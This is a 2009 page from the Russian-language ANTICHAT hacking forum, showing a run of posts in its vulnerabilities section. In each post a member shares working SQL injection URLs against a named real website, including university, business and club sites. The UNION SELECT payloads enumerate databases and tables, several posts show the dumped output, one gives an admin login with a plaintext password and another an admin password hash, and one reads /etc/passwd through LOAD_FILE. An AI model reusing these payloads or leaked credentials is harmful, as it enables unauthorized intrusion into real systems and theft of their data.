ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9161  
Старый 04.05.2009, 18:32
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

ООО “РостИнвестЛизинг” — cовместно с Западно-Уральским банком Сбербанка РФ инвестирует свыше 200 предприятий.

Код:
http://ril.ru/news/?id=30+and+1=0+union+select+1,2,version(),4,5,6,7--
 
Ответить с цитированием

  #9162  
Старый 04.05.2009, 19:26
_SEREGA_
Banned
Регистрация: 28.03.2008
Сообщений: 138
Провел на форуме:
609080

Репутация: 184
Отправить сообщение для _SEREGA_ с помощью ICQ
По умолчанию

скуль:
Код:
http://www.learnbirdsongs.com/birdsong.php?id=-5+union+select+1,2,3,4,5,6,7,8,9--
версия:
Код:
http://www.learnbirdsongs.com/birdsong.php?id=-5+union+select+1,2,3,4,version(),6,7,8,9--
5.0.27

таблицы выводятся limit'om:

Код:
http://www.learnbirdsongs.com/birdsong.php?id=-5+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables--
infa:

Код:
http://www.learnbirdsongs.com/birdsong.php?id=-5+union+select+1,2,3,4,concat_ws(0x3a,user(),database()),6,7,8,9--
user() webtoad@localhost
database() jfdavis_webtoad
 
Ответить с цитированием

  #9163  
Старый 04.05.2009, 21:01
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.design.ucla.edu/people/grad.php?ID=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11
dma@constitution.design.ucla.edu:dma:5.0.45

ПС: Ачат теперь стал ин реинбов стайл?
 
Ответить с цитированием

  #9164  
Старый 04.05.2009, 21:38
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

http://goglobal.fiu.edu
Код:
http://goglobal.fiu.edu/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,19,11,12/*
4.1.14-nt:goglobal:goglobalUser@GOPANTHER.fiu.edu
 
Ответить с цитированием

  #9165  
Старый 04.05.2009, 21:45
_SEREGA_
Banned
Регистрация: 28.03.2008
Сообщений: 138
Провел на форуме:
609080

Репутация: 184
Отправить сообщение для _SEREGA_ с помощью ICQ
По умолчанию

скуль:

Код:
http://www.aroma.us/info_page.php?id=-5+union+select+1,2,3,4,5--
версия:

Код:
http://www.aroma.us/info_page.php?id=-5+union+select+1,2,version(),4,5--
5.0.67

таблицы выводятся limit'om:

Код:
http://www.aroma.us/info_page.php?id=-5+union+select+1,2,table_name,4,5+from+information_schema.tables--
infa:

Код:
http://www.aroma.us/info_page.php?id=-5+union+select+1,2,concat_ws(0x3a,user(),database()),4,5--
user() aroma15_aromasho@localhost
database() aroma15_aromaonline

Последний раз редактировалось _SEREGA_; 04.05.2009 в 22:12.. Причина: replace
 
Ответить с цитированием

  #9166  
Старый 04.05.2009, 21:51
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Пензенский Региональный Центр Интернет Образования
тИЦ: 325
PR: 4
Код:
http://rcio.pnzgu.ru/grad.php?id=4801
Блинд, т.к. третяя ветка - юниона нету...

fio@localhost - User
fio - DB
3.23.58 - Version
 
Ответить с цитированием

  #9167  
Старый 04.05.2009, 22:13
_SEREGA_
Banned
Регистрация: 28.03.2008
Сообщений: 138
Провел на форуме:
609080

Репутация: 184
Отправить сообщение для _SEREGA_ с помощью ICQ
По умолчанию

скуль:

Код:
http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,2,3,4,5,6,7,8--
версия:
Код:
http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,version(),3,4,5,6,7,8--
5.0.24
список таблиц:
Код:
http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables--
видим таблицу login

список столбцов:
Код:
http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,column_name,3,4,5,6,7,8+from+information_schema.columns--
видим стобцы: user и pass

выводим инфу:

user:
Код:
http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,user,3,4,5,6,7,8+from+login--
pass:

Код:
http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,pass,3,4,5,6,7,8+from+login--
infa:

user: exhibit001
pass: ireland2


админку не нашёл =((((((((
 
Ответить с цитированием

  #9168  
Старый 04.05.2009, 22:20
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

http://www.vdostudio.com
Код:
http://www.vdostudio.com/webboard/view.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
version() - 5.0.22
database() - vdostudio
 
Ответить с цитированием

  #9169  
Старый 04.05.2009, 22:21
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Код:
http://www.tepg.se/showtitle.php?id=-1+union+all+select+0,1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5--
юзер/бд/версия:
Код:
wonderwork_db1@192.168.0.56 : wonderwork_db1 : 5.0.51a-24-log
Админ:

Код:
http://www.tepg.se/showtitle.php?id=-1+union+all+select+0,1,CONCAT_WS(CHAR(32,58,32),id,username,password),3,4,5+from+admin--
ид/логин/пасс:

Код:
1 : hdnine : cb7ea8e5ad69ce0be6c3f1f0032dad4a

Последний раз редактировалось -m0rgan-; 04.05.2009 в 22:28..
 
Ответить с цитированием

  #9170  
Старый 04.05.2009, 22:30
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

nfca.org(with file_priv) pr - 6:
PHP код:
http://www.nfca.org/top25/index.php?cat_id=1&poll_id=-234271+union+select+1,2,3,4,5,concat_ws(0x3A,user(),version(),database()),LOAD_FILE(0x2f6574632f706173737764),8--+ 
dbclient@69.94.233.43:4.0.24-log:ism_data_nfca
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ